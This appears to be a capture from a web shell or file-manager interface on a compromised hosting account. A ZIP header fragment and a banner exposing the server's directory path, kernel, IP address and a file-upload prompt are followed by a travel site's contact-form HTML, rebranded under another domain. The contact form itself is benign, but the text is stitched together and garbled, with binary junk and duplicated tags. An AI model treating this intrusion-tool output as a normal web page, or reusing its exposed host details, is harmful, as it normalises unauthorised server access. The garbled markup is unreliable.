PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/ $#$#$#

Dir : /home/trave494/thefreetrips.com/contact/
Server: Linux ngx353.inmotionhosting.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
IP: 209.182.202.254
Choose File :

Url:
Dir : //home/trave494/thefreetrips.com/contact/index.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>zonke.cyou | Contact Us</title>
<meta name="description" content="Contact zonke.cyou">
<meta name="keywords" content="Contact zonke.cyou">
<meta name="robots" content="index, follow">
<meta name="language" content="EN">

<link href="main.css" rel="stylesheet" type="text/css" />
<style type="text/css">
<!--
.style1 {color: #3399FF}
-->
</style>
</head>
<body>
<div id="Top">
  <div id="InTop">
	
 <!--   <div id="TopNavi"><a href="index.php" title="Home">HOME</a><a href="about.php" title="About us">ABOUT US</a><a href="contact.html" title="CONTACT US">CONTACT US</a></div> -->
   <!-- <div id="Navi">
      <ul>
        <li><a href="http://zonke.cyou/shop" title="Travel Shop">TRAVEL SHOP</a></li>
        <li><a href="cruises/cruises.php" title="About us">&nbsp;CRUISES</a></li>
		<li><a href="http://zonke.cyou/rentalcars" title="Rental Car">RENTAL CAR</a></li>
        <li><a href="http://zonke.cyou/findflights/" title="Flights">FLIGHTS</a></li>
        <li><a href="http://zonke.cyou/hotels" title="Hotels">HOTELS</a></li>
      </ul>
    </div> -->
 <!--   <img src="images/logo.png" class="logo" /> -->
  </div>
</div>
<div id="HomeCon"></div>
<div id="HomeMain">
  <div class="clear"></div>
</div>
<!-- </div> -->
-
<!-- 123ContactForm.com script begins here -->

<!-- formalign --><center>

<script type="text/javascript">
<!--
var formrules=new Array(0);
	
//-->
</script>
<script type="text/javascript">
var cfJsHost = (("https:" == document.location.protocol) ? "https://" : "http://");
document.write(unescape("%3Cscript src='" + cfJsHost + "www.123contactform.com/includes/interactive123cf.js?2772' type='text/javascript'%3E%3C/script%3E"));
</script><!--[if lte IE 8]>
	<style type="text/css">
	.class123-likert_style_li2 {height:56px;}
	</style>
	<![endif]-->
<script type="text/javascript">
<!--
var selectedfield='';
var multiPageCurent=1;
var multiPageTotal=1;
function InputActions(field,id) {
	var textcolor='#000000';
	var hltextcolor='#000000';

	if (id==selectedfield) { /* alert('do nothing'); */ }
	else
		{
		// first we unhighlight the previous field, if any
		if (selectedfield!='')
			{
			lid=selectedfield;
			lidsec=lid.replace('row','rowsec');
			
			// reparam culoare textlabels
			var tr=document.getElementById(lid);
	
			if (document.getElementsByClassName) 
				{
			var textlabels = tr.getElementsByClassName('class123-label');
			for (j=0;j<textlabels.length;j++)
				textlabels[j].style.color=textcolor;
				}
				else
				{
				var textlabels=tr.getElementsByTagName('label');
				for (j=0;j<textlabels.length;j++)
					if (textlabels[j].className.indexOf('class123-label')>-1) textlabels[j].style.color=textcolor;
				}
			var oldbg='';
			if (document.getElementById('errorflag'+lid)!=null)
				oldbg=document.getElementById('errorflag'+lid).value;
				
			// reparam culoare bg td
			var tds = tr.getElementsByTagName('div');
			for (j=0;j<tds.length;j++)
				tds[j].parentNode.parentNode.style.background=oldbg;
			
			// reparam culoare bg td sec
			if (document.getElementById(lidsec) != null)
				{
				var trsec=document.getElementById(lidsec);
				tds = trsec.getElementsByTagName('div');
				for (j=0;j<tds.length;j++)	
					tds[j].parentNode.parentNode.style.background=oldbg;
				}
			}
		// then we highlight the new one
		selectedfield=id;
		
		lid=id;
		lidsec=lid.replace('row','rowsec');

		// modificam culoare textlabels
		var tr=document.getElementById(lid);
		if (document.getElementsByClassName) 
			{		
		var textlabels = tr.getElementsByClassName('class123-label');
		for (j=0;j<textlabels.length;j++)
			textlabels[j].style.color=hltextcolor;
			}
			else
			{
			var textlabels=tr.getElementsByTagName('label');
			for (j=0;j<textlabels.length;j++)
				if (textlabels[j].className.indexOf('class123-label')>-1) textlabels[j].style.color=hltextcolor;
			}

		// modificam culoare bg td
		var tds = tr.getElementsByTagName('div');
		for (j=0;j<tds.length;j++)
			tds[j].parentNode.parentNode.style.background='#FEF1C1';
		
		// modificam culoare bg td sec
		if (document.getElementById(lidsec) != null)
			{
			var trsec=document.getElementById(lidsec);
			tds = trsec.getElementsByTagName('div');
			for (j=0;j<tds.length;j++)	
				tds[j].parentNode.parentNode.style.background='#FEF1C1';
			}
		}

	// now the field rules
	
	InputRules('beginning');	
}
function IsFullDateEntered(c_id) {
if  ((document.getElementById('id123-control'+c_id+'-1').value!='')&&(document.getElementById('id123-control'+c_id+'-2').value!='')&&(document.getElementById('id123-control'+c_id+'-3').value!=''))
	document.getElementById('id123-control'+c_id).value=document.getElementById('id123-control'+c_id+'-1').value+'/'+document.getElementById('id123-control'+c_id+'-2').value+'/'+document.getElementById('id123-control'+c_id+'-3').value;
}
//-->
<style>
h1
{
	font-family : Arial, Helvetica, sans-serif;
	font-size : 16px;
    font-weight : bold;
}
label,a 
{
	font-family : Arial, Helvetica, sans-serif;
	font-size : 12px; 
}

</style>	
<!-- a helper script for vaidating the form-->
<script language="JavaScript" src="scripts/gen_validatorv31.js" type="text/javascript"></script>
</head>	
</head>

<body>
<h1>Contact us</h1>
<form method="POST" name="contactform" action="contact-form-handler.php"> 
<p>
<label for='name'>Your Name:</label> <br>
<input type="text" name="name">
</p>
<p>
<label for='email'>Email Address:</label> <br>
<input type="text" name="email"> <br>
</p>
<p>
<label for='message'>Message:</label> <br>
<textarea name="message"></textarea>
</p>
<input type="submit" value="Submit"><br>
</form>

<script language="JavaScript">
// Code for validating the form
// Visit http://www.javascript-coder.com/html-form/javascript-form-validation.phtml
// for details
var frmvalidator  = new Validator("contactform");
frmvalidator.addValidation("name","req","Please provide your name"); 
frmvalidator.addValidation("email","req","Please provide your email"); 
frmvalidator.addValidation("email","email","Please enter a valid email address"); 
</script>
<!--
Sample code from:
http://www.html-form-guide.com/contact-form/php-email-contact-form.html
-->
</script><p align='center' style='float:left; width:100%'>&nbsp;</p></center><!-- formalign ends -->
<script type="text/javascript">multiPageTotal=1;</script>
<p style='clear:both'></p>
<center/>

<div id="Bottom">
  <p>  
  <div align="center">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- need4holiday -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-8328339287525612"
     data-ad-slot="1595903542"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
  <!-- <div id="Bottom">
    <p><a href="http://www.zonke.cyou/index.php" title="Home page">Home</a> | <a href="http://zonke.cyou/hotels/" title="Search Hotels">Search Hotels</a> | <a href="http://zonke.cyou/shop" title="Travel Shop">Travel Shop</a> | <a href="http://www.zonke.cyou/findflights/" title="Find Flights">Find Flights</a> | <a href="http://www.zonke.cyou/rentalcars/" title="Rental Cars">Rental Cars</a> | <a href="http://www.zonke.cyou/about.php" title="About">About</a> | <a href="http://www.zonke.cyou/contact.html" title="Contact">Contact</a> | <a href="http://www.zonke.cyou/privacy.html" title="Privacy">Privacy</a>  </p>
  <p>Welcome. Here you'll find the best prices and reviews to thousands of great Hotels, Flights, Car Rent in more than 60 countries. You can also find the best  prices.<br />
Get started now and book your perfect trip. </p>
    <div id="Social"><a href="https://www.facebook.com/need4holiday/" title="Fecebook" target="_blank" rel="NOFOLLOW"><img src="../images/fb.gif" alt="Facebook" width="40" height="40" border="0" /></a><a href="http://www.twitter.com/need4holidays" title="Twitter" target="_blank" rel="NOFOLLOW"><img src="../images/tw.gif" alt="Twitter" width="40" height="40" border="0" /></a><a href="https://www.linkedin.com/in/need4-holiday-174677113?trk=nav_responsive_tab_profile" title="Linked In" target="_blank" rel="NOFOLLOW"><img src="../images/in.gif" alt="Linked In" width="40" height="40" border="0" /></a><a href="https://www.youtube.com/channel/UCGK9WL4oOWoTk-ESr4iMQSA" title="Youtube" target="_blank" rel="NOFOLLOW"><img src="../images/yt.gif" alt="Youtube" width="40" height="40" border="0" /></a></div>
    <p>Copyright © 2025<a href="http://zonke.cyou">zonke.cyou</a>All Rights Reserved. 
      Developed by<a href="http://www.zonke.cyou" target="_blank">zonke.cyou</a>Powered by<a href=" target="_blank">Benavides Group</a></p>
  </div> -->
</div>
</body>
</html>